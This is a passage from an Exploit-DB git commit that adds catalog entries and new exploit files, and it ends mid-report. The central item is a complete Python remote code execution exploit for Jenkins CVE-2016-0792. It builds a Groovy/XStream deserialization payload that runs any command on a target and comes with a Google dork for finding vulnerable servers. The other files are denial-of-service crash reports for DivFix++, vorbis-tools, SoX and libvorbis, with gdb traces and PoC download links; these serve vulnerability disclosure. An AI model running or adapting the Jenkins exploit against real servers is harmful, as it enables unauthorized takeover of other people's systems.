DB: 2017-08-01

7 new exploits DivFix++ 0.34 - Denial of Service Vorbis Tools oggenc 1.4.0 - '.wav' Denial of Service Sound eXchange (SoX) 14.4.2 - Multiple Vulnerabilities libvorbis 1.3.5 - Multiple Vulnerabilities libao 1.2.0 - Denial of Service Jenkins < 1.650 - Java Deserialization DiskBoss Enterprise 8.2.14 - Buffer Overflow
2017-08-01 05:01:29 +00:00 · 2017-08-01 05:01:29 +00:00 · c116e6f563
commit c116e6f563
parent 5040eaef41
8 changed files with 897 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -5629,6 +5629,11 @@ id,file,description,date,author,platform,type,port
 42389,platforms/linux/dos/42389.txt,"SoundTouch 1.9.2 - Multiple Vulnerabilities",2017-07-28,qflb.wu,linux,dos,0
 42390,platforms/linux/dos/42390.txt,"LAME 3.99.5 - Multiple Vulnerabilities",2017-07-28,qflb.wu,linux,dos,0
 42391,platforms/linux/dos/42391.txt,"libjpeg-turbo 1.5.1 - Denial of Service",2017-07-28,qflb.wu,linux,dos,0
 42396,platforms/linux/dos/42396.txt,"DivFix++ 0.34 - Denial of Service",2017-07-31,qflb.wu,linux,dos,0
 42397,platforms/linux/dos/42397.txt,"Vorbis Tools oggenc 1.4.0 - '.wav' Denial of Service",2017-07-31,qflb.wu,linux,dos,0
 42398,platforms/linux/dos/42398.txt,"Sound eXchange (SoX) 14.4.2 - Multiple Vulnerabilities",2017-07-31,qflb.wu,linux,dos,0
 42399,platforms/linux/dos/42399.txt,"libvorbis 1.3.5 - Multiple Vulnerabilities",2017-07-31,qflb.wu,linux,dos,0
 42400,platforms/linux/dos/42400.txt,"libao 1.2.0 - Denial of Service",2017-07-31,qflb.wu,linux,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -15706,9 +15711,11 @@ id,file,description,date,author,platform,type,port
 42327,platforms/windows/remote/42327.html,"Firefox 50.0.1 - ASM.JS JIT-Spray Remote Code Execution",2017-07-14,Rh0,windows,remote,0
 42328,platforms/windows/remote/42328.py,"FTPGetter 5.89.0.85 - Buffer Overflow (SEH)",2017-07-14,"Paul Purcell",windows,remote,0
 42331,platforms/hardware/remote/42331.txt,"Belkin NetCam F7D7601 - Multiple Vulnerabilities",2017-07-17,Wadeek,hardware,remote,0
 42394,platforms/java/remote/42394.py,"Jenkins < 1.650 - Java Deserialization",2017-07-30,"Janusz Piechówka",java,remote,0
 42354,platforms/win_x86-64/remote/42354.html,"Microsoft Internet Explorer - 'mshtml.dll' Remote Code Execution (MS17-007)",2017-07-24,redr2e,win_x86-64,remote,0
 42369,platforms/cgi/remote/42369.rb,"IPFire < 2.19 Update Core 110 - Remote Code Execution (Metasploit)",2017-07-24,Metasploit,cgi,remote,0
 42370,platforms/unix/remote/42370.rb,"VICIdial 2.9 RC 1 to 2.13 RC1 - user_authorization Unauthenticated Command Execution (Metasploit)",2017-07-24,Metasploit,unix,remote,0
 42395,platforms/windows/remote/42395.py,"DiskBoss Enterprise 8.2.14 - Buffer Overflow",2017-07-30,"Ahmad Mahfouz",windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
--- a/platforms/java/remote/42394.py
+++ b/platforms/java/remote/42394.py
@ -0,0 +1,93 @@
 import random
 import string
 from decimal import Decimal
 import requests
 from requests.exceptions import RequestException
 # Exploit Title: Jenkins CVE-2016-0792 Deserialization Remote Exploit
 # Google Dork: intitle: "Dashboard [Jenkins]" + "Manage Jenkins"
 # Date: 30-07-2017
 # Exploit Author: Janusz Piechówka
 # Github: https://github.com/jpiechowka/jenkins-cve-2016-0792
 # Vendor Homepage: https://jenkins.io/
 # Version: Versions before 1.650 and LTS before 1.642.2
 # Tested on: Debian
 # CVE : CVE-2016-0792
 def prepare_payload(command):
    splitCommand = command.split()
    preparedCommands = ''
    for entry in splitCommand:
        preparedCommands += f'<string>{entry}</string>'
    xml = f'''
        <map>
          <entry>
            <groovy.util.Expando>
              <expandoProperties>
                <entry>
                  <string>hashCode</string>
                  <org.codehaus.groovy.runtime.MethodClosure>
                    <delegate class="groovy.util.Expando"/>
                    <owner class="java.lang.ProcessBuilder">
                      <command>{preparedCommands}</command>
                    </owner>
                    <method>start</method>
                  </org.codehaus.groovy.runtime.MethodClosure>
                </entry>
              </expandoProperties>
            </groovy.util.Expando>
            <int>1</int>
          </entry>
        </map>'''
    return xml
 def exploit(url, command):
    print(f'[*] STARTING')
    try:
        print(f'[+] Trying to exploit Jenkins running at address: {url}')
        # Perform initial URL check to see if server is online and returns correct response code using HEAD request
        headResponse = requests.head(url, timeout=30)
        if headResponse.status_code == requests.codes.ok:
            print(f'[+] Server online and responding | RESPONSE: {headResponse.status_code}')
            # Check if X-Jenkins header containing version is present then proceed
            jenkinsVersionHeader = headResponse.headers.get('X-Jenkins')
            if jenkinsVersionHeader is not None:
                # Strip version after second dot from header to perform conversion to Decimal
                stripCharacter = "."
                strippedVersion = stripCharacter.join(jenkinsVersionHeader.split(stripCharacter)[:2])
                # Perform basic version check
                if Decimal(strippedVersion) < 1.650:
                    print(f'[+] Jenkins version: {Decimal(strippedVersion)} | VULNERABLE')
                    # Prepare payload
                    payload = prepare_payload(command)
                    # Prepare POST url
                    randomJobName = ''.join(random.SystemRandom().choice(string.ascii_lowercase + string.digits) for _ in range(8))
                    if url.endswith('/'):
                        postUrl = f'{url}createItem?name={randomJobName}'
                    else:
                        postUrl = f'{url}/createItem?name={randomJobName}'
                    print(f'[+] Will POST to {postUrl}')
                    # Try to execute passed command
                    postResponse = requests.post(postUrl, data=payload, headers={'Content-Type': 'application/xml'})
                    print(f'[+] Exploit launched ')
                    # 500 response code is ok here
                    print(f'[+] Response code: {postResponse.status_code} ')
                    if postResponse.status_code == 500:
                        print('[+] SUCCESS')
                    else:
                        print('[-][ERROR] EXPLOIT LAUNCHED, BUT WRONG RESPONSE CODE RETURNED')
                else:
                    print(f'[-][ERROR] Version {Decimal(strippedVersion)} is not vulnerable')
            else:
                print(f'[-][ERROR] X-Jenkins header not present, check if Jenkins is actually running at {url}')
        else:
            print(f'[-][ERROR] {url} Server did not return success response code | RESPONSE: {headResponse.status_code}')
    except RequestException as ex:
        print(f'[-] [ERROR] Request exception: {ex}')
    print('[*] FINISHED')
--- a/platforms/linux/dos/42396.txt
+++ b/platforms/linux/dos/42396.txt
@ -0,0 +1,96 @@
 DivFix++ denial of service vulnerability
 ================
 Author : qflb.wu
 ===============
 Introduction:
 =============
 DivFix++ is FREE AVI Video Fix & Preview program.
 Affected version:
 =====
 v0.34
 Vulnerability Description:
 ==========================
 the DivFixppCore::avi_header_fix function in src/DivFix++Core.cpp in DivFix++ v0.34 can cause a denial of service(invalid memory write and application crash) via a crafted avi file.
 ./DivFix++ -i DivFix++_v0.34_invalid_memory_write.avi -o out.avi
 ----debug info:----
 Program received signal SIGSEGV, Segmentation fault.
 __memcpy_sse2_unaligned ()
    at ../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S:167
 167../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S: No such file or directory.
 (gdb) bt
 #0  __memcpy_sse2_unaligned ()
    at ../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S:167
 #1  0x00000000004239d8 in DivFixppCore::avi_header_fix() ()
 #2  0x000000000042c0c0 in DivFixppCore::Fix(wxString, wxString, bool, bool, bool, bool) ()
 #3  0x000000000041404a in DivFixppApp::OnCmdLineParsed(wxCmdLineParser&) ()
 #4  0x0000000000414f6e in DivFixppApp::OnInit() ()
 #5  0x0000000000416f4f in wxAppConsoleBase::CallOnInit() ()
 #6  0x00007ffff6c6903c in wxEntry(int&, wchar_t**) ()
   from /usr/lib/x86_64-linux-gnu/libwx_baseu-3.0.so.0
 #7  0x0000000000411e70 in main ()
 (gdb) 
 -------------------
 (gdb) disassemble 0x00000000004239b0,0x00000000004239df
 Dump of assembler code from 0x4239b0 to 0x4239df:
   0x00000000004239b0 <_ZN12DivFixppCore14avi_header_fixEv+3504>:add    %al,(%rax)
   0x00000000004239b2 <_ZN12DivFixppCore14avi_header_fixEv+3506>:mov    %eax,%edi
   0x00000000004239b4 <_ZN12DivFixppCore14avi_header_fixEv+3508>:callq  0x434eaf <_Z17make_littleendianIiERT_S0_>
   0x00000000004239b9 <_ZN12DivFixppCore14avi_header_fixEv+3513>:mov    -0x138(%rbp),%rdx
   0x00000000004239c0 <_ZN12DivFixppCore14avi_header_fixEv+3520>:mov    0x38(%rdx),%rdx
   0x00000000004239c4 <_ZN12DivFixppCore14avi_header_fixEv+3524>:lea    0x10(%rdx),%rcx
   0x00000000004239c8 <_ZN12DivFixppCore14avi_header_fixEv+3528>:mov    $0x4,%edx
   0x00000000004239cd <_ZN12DivFixppCore14avi_header_fixEv+3533>:mov    %rax,%rsi
   0x00000000004239d0 <_ZN12DivFixppCore14avi_header_fixEv+3536>:mov    %rcx,%rdi
 => 0x00000000004239d3 <_ZN12DivFixppCore14avi_header_fixEv+3539>:callq  0x40fcc0 <memcpy@plt>
   0x00000000004239d8 <_ZN12DivFixppCore14avi_header_fixEv+3544>:mov    -0x138(%rbp),%rax
 ---Type <return> to continue, or q <return> to quit---
 End of assembler dump.
 (gdb) i r 
 rax            0x6615286690088
 rbx            0x00
 rcx            0x1016
 rdx            0x44
 rsi            0x6615286690088
 rdi            0x1016
 rbp            0x7fffffffcf100x7fffffffcf10
 rsp            0x7fffffffcdd00x7fffffffcdd0
 r8             0x8049308407344
 r9             0x7ffff7fc1a40140737353882176
 r10            0x640000006e429496729710
 r11            0x00
 r12            0x11
 r13            0x11
 r14            0x00
 r15            0x00
 rip            0x4239d30x4239d3 <DivFixppCore::avi_header_fix()+3539>
 eflags         0x246[ PF ZF IF ]
 cs             0x3351
 ss             0x2b43
 ds             0x00
 es             0x00
 fs             0x00
 ---Type <return> to continue, or q <return> to quit---
 gs             0x00
 (gdb)
 POC:
 DivFix++_v0.34_invalid_memory_write.avi
 CVE:
 CVE-2017-11330
 Proof of Concept:
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42396.zip
--- a/platforms/linux/dos/42397.txt
+++ b/platforms/linux/dos/42397.txt
@ -0,0 +1,65 @@
 vorbis-tools oggenc vulnerability
 ================
 Author : qflb.wu
 ===============
 Introduction:
 =============
 The Vorbis Tools package contains command-line tools useful for encoding, playing or editing files using the Ogg CODEC.
 Affected version:
 =====
 1.4.0
 Vulnerability Description:
 ==========================
 the wav_open function in oggenc/audio.c in vorbis-tools 1.4.0 can cause a denial of service(memory allocation error) via a crafted wav file.
 ./oggenc vorbis-tools_1.4.0_oggenc_memory_allocation_error.wav -o out
 ==68126==WARNING: AddressSanitizer failed to allocate 0xffffffffffffbc00 bytes
 ==68126==AddressSanitizer's allocator is terminating the process instead of returning 0
 ==68126==If you don't like this behavior set allocator_may_return_null=1
 ==68126==AddressSanitizer CHECK failed: /build/buildd/llvm-toolchain-3.4-3.4/projects/compiler-rt/lib/sanitizer_common/sanitizer_allocator.cc:149 "((0)) != (0)" (0x0, 0x0)
    #0 0x46d41f in __asan::AsanCheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/home/a/Downloads/vorbis-tools-1.4.0/oggenc/oggenc+0x46d41f)
    #1 0x472c81 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/home/a/Downloads/vorbis-tools-1.4.0/oggenc/oggenc+0x472c81)
    #2 0x4719c0 in __sanitizer::AllocatorReturnNull() (/home/a/Downloads/vorbis-tools-1.4.0/oggenc/oggenc+0x4719c0)
    #3 0x4674b6 in __interceptor_malloc (/home/a/Downloads/vorbis-tools-1.4.0/oggenc/oggenc+0x4674b6)
    #4 0x492896 in wav_open /home/a/Downloads/vorbis-tools-1.4.0/oggenc/audio.c:573
    #5 0x496d8e in open_audio_file /home/a/Downloads/vorbis-tools-1.4.0/oggenc/audio.c:86
    #6 0x485d0a in main /home/a/Downloads/vorbis-tools-1.4.0/oggenc/oggenc.c:256
    #7 0x7f6d9f8dcec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
    #8 0x47d55c in _start (/home/a/Downloads/vorbis-tools-1.4.0/oggenc/oggenc+0x47d55c)
    -----------------
 wav->channel_permute = malloc(wav->channels * sizeof(int));
 if (wav->channels <= 8)
   /* Where we know the mappings, use them. */
   memcpy(wav->channel_permute, wav_permute_matrix[wav->channels-1], 
           sizeof(int) * wav->channels);
 else
   /* Use a default 1-1 mapping */
   for (i=0; i < wav->channels; i++)
       wav->channel_permute[i] = i;
 return 1;
 Andthe code didn't check the return of malloc.
 POC:
 vorbis-tools_1.4.0_oggenc_memory_allocation_error.wav
 CVE:
 CVE-2017-11331
 Proof of Concept:
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42397.zip
--- a/platforms/linux/dos/42398.txt
+++ b/platforms/linux/dos/42398.txt
@ -0,0 +1,270 @@
 Sound eXchange (SoX) multiple vulnerabilities
 ================
 Author : qflb.wu
 ===============
 Introduction:
 =============
 SoX is a cross-platform (Windows, Linux, MacOS X, etc.) command line utility that can convert various formats of computer audio files in to other formats. It can also apply various effects to these sound files, and, as an added bonus, SoX can play and record audio files on most platforms.
 Affected version:
 =====
 14.4.2
 Vulnerability Description:
 ==========================
 1.
 the startread function in wav.c in Sound eXchange(SoX) 14.4.2 can cause a denial of service(divide-by-zero error and application crash) via a crafted wav file.
 ./sox sox_14.4.2_divide_by_zero_error_1.wav out.ogg
 ----debug info:----
 Program received signal SIGFPE, Arithmetic exception.
 0x00007ffff7b9c829 in startread (ft=0x611540) at wav.c:950
 950        wav->numSamples = div_bits(qwDataLength, ft->encoding.bits_per_sample) / ft->signal.channels;
 (gdb) disassemble 0x00007ffff7b9c829,0x00007ffff7b9c8ff
 Dump of assembler code from 0x7ffff7b9c829 to 0x7ffff7b9c8ff:
 => 0x00007ffff7b9c829 <startread+1577>:div    %rcx
   0x00007ffff7b9c82c <startread+1580>:mov    %rax,0x0(%rbp)
   0x00007ffff7b9c830 <startread+1584>:imul   %rcx,%rax
   0x00007ffff7b9c834 <startread+1588>:mov    %rax,0x18(%rbx)
   0x00007ffff7b9c838 <startread+1592>:mov    0x28(%rbp),%r8d
   0x00007ffff7b9c83c <startread+1596>:test   %r8d,%r8d
   0x00007ffff7b9c83f <startread+1599>:je     0x7ffff7b9c849 <startread+1609>
   0x00007ffff7b9c841 <startread+1601>:movq   $0x0,0x18(%rbx)
   0x00007ffff7b9c849 <startread+1609>:mov    %r9d,0x14(%rsp)
   0x00007ffff7b9c84e <startread+1614>:mov    %edi,0x10(%rsp)
   0x00007ffff7b9c852 <startread+1618>:callq  0x7ffff7b50390 <sox_get_globals@plt>
   0x00007ffff7b9c857 <startread+1623>:cmpw   $0x1,0x22(%rsp)
   0x00007ffff7b9c85d <startread+1629>:lea    0x241fa(%rip),%rdx        # 0x7ffff7bc0a5e
   0x00007ffff7b9c864 <startread+1636>:mov    0x10(%rsp),%edi
   0x00007ffff7b9c868 <startread+1640>:mov    0x30(%rsp),%r8d
   0x00007ffff7b9c86d <startread+1645>:lea    0x1de3a(%rip),%rcx        # 0x7ffff7bba6ae
   0x00007ffff7b9c874 <startread+1652>:mov    %rdx,0x40(%rax)
   0x00007ffff7b9c878 <startread+1656>:lea    0x115e7(%rip),%rax        # 0x7ffff7bade66
 ---Type <return> to continue, or q <return> to quit---q
 End of assembler dump.
 (gdb) i r
 rax            0x5371335
 rbx            0x6115406362432
 rcx            0x00
 rdx            0x00
 rsi            0x88
 rdi            0x11
 rbp            0x611a600x611a60
 rsp            0x7fffffffdc000x7fffffffdc00
 r8             0x7ffff7fce7c0140737353934784
 r9             0x00
 r10            0x7fffffffd9c0140737488345536
 r11            0x7ffff72cca80140737340295808
 r12            0x5371335
 r13            0x7fffffffdc50140737488346192
 r14            0x7fffffffdc40140737488346176
 r15            0x00
 rip            0x7ffff7b9c8290x7ffff7b9c829 <startread+1577>
 eflags         0x10246[ PF ZF IF RF ]
 cs             0x3351
 ss             0x2b43
 ds             0x00
 es             0x00
 fs             0x00
 gs             0x00
 (gdb)
 POC:
 sox_14.4.2_divide_by_zero_error_1.wav
 CVE:
 CVE-2017-11332
 2.
 the read_samples function in hcom.c in Sound eXchange(SoX) 14.4.2 can cause a denial of service(invalid memory read and application crash) via a crafted hcom file.
 ./sox sox_14.4.2_invalid_memory_read.hcom out.wav
 ----debug info:----
 Program received signal SIGSEGV, Segmentation fault.
 read_samples (ft=0x611590, buf=0x61460c, len=8185) at hcom.c:215
 215                if(p->dictionary[p->dictentry].dict_leftson < 0) {
 (gdb) bt
 #0  read_samples (ft=0x611590, buf=0x61460c, len=8185) at hcom.c:215
 #1  0x00007ffff7b58409 in sox_read (ft=ft@entry=0x611590, buf=<optimized out>, 
    len=8192) at formats.c:978
 #2  0x0000000000409dd4 in sox_read_wide (ft=0x611590, buf=<optimized out>, 
    max=<optimized out>) at sox.c:490
 #3  0x000000000040a32e in combiner_drain (effp=0x614410, obuf=0x6145f0, 
    osamp=0x7fffffffdbb0) at sox.c:552
 #4  0x00007ffff7b68c0d in drain_effect (n=0, chain=0x614260) at effects.c:352
 #5  sox_flow_effects (chain=0x614260, 
    callback=callback@entry=0x405a80 <update_status>, 
    client_data=client_data@entry=0x0) at effects.c:445
 #6  0x0000000000407bf6 in process () at sox.c:1802
 #7  0x0000000000403085 in main (argc=3, argv=0x7fffffffdf98) at sox.c:3008
 (gdb) disassemble 
 Dump of assembler code for function read_samples:
   0x00007ffff7b93900 <+0>:push   %r15
   0x00007ffff7b93902 <+2>:push   %r14
   0x00007ffff7b93904 <+4>:mov    %rsi,%r14
   0x00007ffff7b93907 <+7>:push   %r13
   0x00007ffff7b93909 <+9>:push   %r12
   0x00007ffff7b9390b <+11>:push   %rbp
   0x00007ffff7b9390c <+12>:push   %rbx
   0x00007ffff7b9390d <+13>:mov    %rdi,%rbx
   0x00007ffff7b93910 <+16>:sub    $0x28,%rsp
   0x00007ffff7b93914 <+20>:mov    0x2d0(%rdi),%r15
   0x00007ffff7b9391b <+27>:mov    0x24(%r15),%esi
   0x00007ffff7b9391f <+31>:test   %esi,%esi
   0x00007ffff7b93921 <+33>:js     0x7ffff7b93a60 <read_samples+352>
   0x00007ffff7b93927 <+39>:mov    0x10(%r15),%rdi
   0x00007ffff7b9392b <+43>:xor    %eax,%eax
   0x00007ffff7b9392d <+45>:lea    (%rax,%rdx,1),%r13d
   0x00007ffff7b93931 <+49>:lea    0x28(%r15),%rbp
   0x00007ffff7b93935 <+53>:mov    %rdx,%r12
   0x00007ffff7b93938 <+56>:lea    0x1(%r13),%eax
   0x00007ffff7b9393c <+60>:mov    %eax,0xc(%rsp)
   0x00007ffff7b93940 <+64>:mov    %r13d,%eax
   0x00007ffff7b93943 <+67>:mov    %r12d,0x8(%rsp)
 ---Type <return> to continue, or q <return> to quit---
   0x00007ffff7b93948 <+72>:sub    %r12d,%eax
   0x00007ffff7b9394b <+75>:mov    %eax,(%rsp)
   0x00007ffff7b9394e <+78>:jmp    0x7ffff7b93989 <read_samples+137>
   0x00007ffff7b93950 <+80>:lea    -0x1(%rax),%r8d
   0x00007ffff7b93954 <+84>:movslq 0x20(%r15),%rax
   0x00007ffff7b93958 <+88>:mov    0x28(%r15),%edx
   0x00007ffff7b9395c <+92>:mov    (%r15),%rsi
   0x00007ffff7b9395f <+95>:shl    $0x4,%rax
   0x00007ffff7b93963 <+99>:test   %edx,%edx
   0x00007ffff7b93965 <+101>:js     0x7ffff7b939e0 <read_samples+224>
   0x00007ffff7b93967 <+103>:movswq 0x8(%rsi,%rax,1),%rax
   0x00007ffff7b9396d <+109>:mov    %eax,0x20(%r15)
   0x00007ffff7b93971 <+113>:shl    $0x4,%rax
   0x00007ffff7b93975 <+117>:add    %edx,%edx
   0x00007ffff7b93977 <+119>:mov    %r8d,0x24(%r15)
   0x00007ffff7b9397b <+123>:add    %rsi,%rax
   0x00007ffff7b9397e <+126>:mov    %edx,0x28(%r15)
 => 0x00007ffff7b93982 <+130>:cmpw   $0x0,0x8(%rax)
   0x00007ffff7b93987 <+135>:js     0x7ffff7b939f0 <read_samples+240>
   0x00007ffff7b93989 <+137>:test   %rdi,%rdi
   0x00007ffff7b9398c <+140>:jle    0x7ffff7b93a48 <read_samples+328>
   0x00007ffff7b93992 <+146>:mov    0x24(%r15),%eax
   0x00007ffff7b93996 <+150>:test   %eax,%eax
 ---Type <return> to continue, or q <return> to quit---q
 Quit
 (gdb) i r
 rax            0x631b306495024
 rbx            0x6115906362512
 rcx            0x11
 rdx            0x6900006881280
 rsi            0x611b206363936
 rdi            0x5241316
 rbp            0x611ad80x611ad8
 rsp            0x7fffffffda300x7fffffffda30
 r8             0x1016
 r9             0x7ffff7fce7c0140737353934784
 r10            0x7fffffffd7f0140737488345072
 r11            0x7ffff72cb2e0140737340289760
 r12            0x1ff98185
 r13            0x20008192
 r14            0x61460c6374924
 r15            0x611ab06363824
 rip            0x7ffff7b939820x7ffff7b93982 <read_samples+130>
 eflags         0x10206[ PF IF RF ]
 cs             0x3351
 ss             0x2b43
 ds             0x00
 es             0x00
 fs             0x00
 ---Type <return> to continue, or q <return> to quit---q
 Quit
 (gdb) x/20x $rax+8
 0x631b38:Cannot access memory at address 0x631b38
 (gdb)
 POC:
 sox_14.4.2_invalid_memory_read.hcom
 CVE:
 CVE-2017-11358
 3.
 the wavwritehdr function in wav.c in Sound eXchange(SoX) 14.4.2 allows remote attackers to cause a denial of service(divide-by-zero error and application crash) via a crafted snd file which convert to wav file.
 ./sox sox_14.4.2_divide_by_zero_error_2.snd out.wav
 ----debug info:----
 Program received signal SIGFPE, Arithmetic exception.
 0x00007ffff7b9a97b in wavwritehdr (ft=ft@entry=0x611bf0, 
    second_header=second_header@entry=0) at wav.c:1457
 1457        blocksWritten = MS_UNSPEC/wBlockAlign;
 (gdb) bt
 #0  0x00007ffff7b9a97b in wavwritehdr (ft=ft@entry=0x611bf0, 
    second_header=second_header@entry=0) at wav.c:1457
 #1  0x00007ffff7b9c0e9 in startwrite (ft=0x611bf0) at wav.c:1252
 #2  0x00007ffff7b59e32 in open_write (
    path=path@entry=0x611bc0 "/home/a/Documents/out.wav", 
    buffer=buffer@entry=0x0, buffer_size=buffer_size@entry=0, 
    buffer_ptr=buffer_ptr@entry=0x0, 
    buffer_size_ptr=buffer_size_ptr@entry=0x0, signal=signal@entry=0x611410, 
    encoding=encoding@entry=0x611430, filetype=0x611bd6 "wav", 
    oob=oob@entry=0x7fffffffdcd0, 
    overwrite_permitted=overwrite_permitted@entry=0x409ce0 <overwrite_permitted>) at formats.c:912
 #3  0x00007ffff7b5a5e8 in sox_open_write (
    path=path@entry=0x611bc0 "/home/a/Documents/out.wav", 
    signal=signal@entry=0x611410, encoding=encoding@entry=0x611430, 
    filetype=<optimized out>, oob=oob@entry=0x7fffffffdcd0, 
    overwrite_permitted=overwrite_permitted@entry=0x409ce0 <overwrite_permitted>) at formats.c:948
 #4  0x000000000040847a in open_output_file () at sox.c:1557
 #5  process () at sox.c:1754
 #6  0x0000000000403085 in main (argc=3, argv=0x7fffffffdfa8) at sox.c:3008
 (gdb) disassemble 0x00007ffff7b9a97b,0x00007ffff7b9a9ff
 Dump of assembler code from 0x7ffff7b9a97b to 0x7ffff7b9a9ff:
 => 0x00007ffff7b9a97b <wavwritehdr+427>:idivl  0x10(%rsp)
   0x00007ffff7b9a97f <wavwritehdr+431>:movslq %eax,%rcx
   0x00007ffff7b9a982 <wavwritehdr+434>:imul   %eax,%r12d
   0x00007ffff7b9a986 <wavwritehdr+438>:mov    %rcx,0x48(%rsp)
   0x00007ffff7b9a98b <wavwritehdr+443>:imul   %r14d,%eax
   0x00007ffff7b9a98f <wavwritehdr+447>:cmp    $0x31,%bp
   0x00007ffff7b9a993 <wavwritehdr+451>:mov    %eax,0x40(%rsp)
   0x00007ffff7b9a997 <wavwritehdr+455>:je     0x7ffff7b9aff0 <wavwritehdr+2080>
   0x00007ffff7b9a99d <wavwritehdr+461>:cmp    $0x1,%bp
   0x00007ffff7b9a9a1 <wavwritehdr+465>:je     0x7ffff7b9b0a8 <wavwritehdr+2264>
   0x00007ffff7b9a9a7 <wavwritehdr+471>:movzwl 0x3e(%rsp),%eax
   0x00007ffff7b9a9ac <wavwritehdr+476>:movl   $0x0,0x34(%rsp)
   0x00007ffff7b9a9b4 <wavwritehdr+484>:lea    0x12(%rax),%r13d
   0x00007ffff7b9a9b8 <wavwritehdr+488>:mov    %r12d,%eax
   0x00007ffff7b9a9bb <wavwritehdr+491>:and    $0x1,%eax
   0x00007ffff7b9a9be <wavwritehdr+494>:movzwl %r13w,%r13d
   0x00007ffff7b9a9c2 <wavwritehdr+498>:lea    (%r12,%r13,1),%edx
   0x00007ffff7b9a9c6 <wavwritehdr+502>:add    %edx,%eax
   0x00007ffff7b9a9c8 <wavwritehdr+504>:cmp    $0x1,%bp
   0x00007ffff7b9a9cc <wavwritehdr+508>:setne  0x3d(%rsp)
 ---Type <return> to continue, or q <return> to quit---q
 Quit
 (gdb) x/10gx $rsp+10
 0x7fffffffdaaa:0x00000000000000000x0056000000000000
 0x7fffffffdaba:0x00010000000000d40x0001000000000000
 0x7fffffffdaca:0x00000000000800000x0000000000000008
 0x7fffffffdada:0x0fe000007fff00000x876000007ffff7bc
 0x7fffffffdaea:0x00d000007ffff7610x21a0000000000000
 (gdb) 
 POC:
 sox_14.4.2_divide_by_zero_error_2.snd
 CVE:
 CVE-2017-11359
 Proof of Concept:
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42398.zip
--- a/platforms/linux/dos/42399.txt
+++ b/platforms/linux/dos/42399.txt
@ -0,0 +1,187 @@
 libvorbis multiple vulnerabilities
 ================
 Author : qflb.wu
 ===============
 Introduction:
 =============
 The libvorbis package contains a general purpose audio and music encoding format. This is useful for creating (encoding) and playing (decoding) sound in an open (patent free) format.
 Affected version:
 =====
 1.3.5
 Vulnerability Description:
 ==========================
 1.
 the vorbis_analysis_wrote function in lib/block.c in Xiph.Org libvorbis 1.3.5 can cause a denial of service(OOM) via a crafted wav file.
 I found this bug when I test Sound eXchange(SoX) 14.4.2 which used the libvorbis library.
 ./sox libvorbis_1.3.5_OOM.wav out.ogg
 /var/log/syslog info:
  Jul 13 19:58:05 ubuntu kernel: [] Out of memory: Kill process 44203 (sox) score 364 or sacrifice child
 Jul 13 19:58:05 ubuntu kernel: [] Killed process 44203 (sox) total-vm:1831804kB, anon-rss:599932kB, file-rss:40kB
 ----debug info:----
 #0  0x00007ffff5df5e92 in vorbis_analysis_wrote ()
 from /usr/local/lib/libvorbis.so.0
 #1  0x00007ffff7ba1cba in write_samples (ft=0x611c20, buf=buf@entry=0x0, 
    len=len@entry=0x0) at vorbis.c:358
 #2  0x00007ffff7ba1dc5 in stopwrite (ft=<optimized out>) at vorbis.c:398
 #3  0x00007ffff7b58488 in sox_close (ft=0x611c20) at formats.c:1006
 #4  0x0000000000405fa8 in cleanup () at sox.c:246
 #5  0x0000000000403479 in main (argc=argc@entry=0x3, 
    argv=argv@entry=0x7fffffffe5e8) at sox.c:3050
 #6  0x00007ffff727bec5 in __libc_start_main (main=0x4029c0 <main>, argc=0x3, 
    argv=0x7fffffffe5e8, init=<optimized out>, fini=<optimized out>, 
    rtld_fini=<optimized out>, stack_end=0x7fffffffe5d8) at libc-start.c:287
 #7  0x0000000000403c65 in _start ()
 --------
 Program terminated with signal SIGKILL, Killed.
 The program no longer exists.
 POC:
 libvorbis_1.3.5_OOM.wav
 CVE:
 CVE-2017-11333
 2.
 the vorbis_block_clear function in lib/block.c in Xiph.Org libvorbis 1.3.5 can cause a denial of service(NULL pointer dereference and application crash) via a crafted ogg file.
 I found this bug when I test mp3splt 2.6.2 which used the libvorbis library.
 ./mp3splt -P -t 0.9 libvorbis_1.3.5_null_pointer_dereference.ogg
 ----debug info:----
 0x00007ffff61752c0 in vorbis_block_clear () from /usr/local/lib/libvorbis.so.0
 (gdb) disassemble 
 Dump of assembler code for function vorbis_block_clear:
   0x00007ffff61752a0 <+0>:push   %r14
   0x00007ffff61752a2 <+2>:mov    %rdi,%r14
   0x00007ffff61752a5 <+5>:push   %r13
   0x00007ffff61752a7 <+7>:push   %r12
   0x00007ffff61752a9 <+9>:push   %rbp
   0x00007ffff61752aa <+10>:push   %rbx
   0x00007ffff61752ab <+11>:mov    0xb8(%rdi),%r13
   0x00007ffff61752b2 <+18>:callq  0x7ffff616b240 <_vorbis_block_ripcord@plt>
   0x00007ffff61752b7 <+23>:mov    0x70(%r14),%rdi
   0x00007ffff61752bb <+27>:test   %rdi,%rdi
   0x00007ffff61752be <+30>:je     0x7ffff61752c5 <vorbis_block_clear+37>
 => 0x00007ffff61752c0 <+32>:callq  0x7ffff616b130 <free@plt>
   0x00007ffff61752c5 <+37>:test   %r13,%r13
   0x00007ffff61752c8 <+40>:je     0x7ffff617530c <vorbis_block_clear+108>
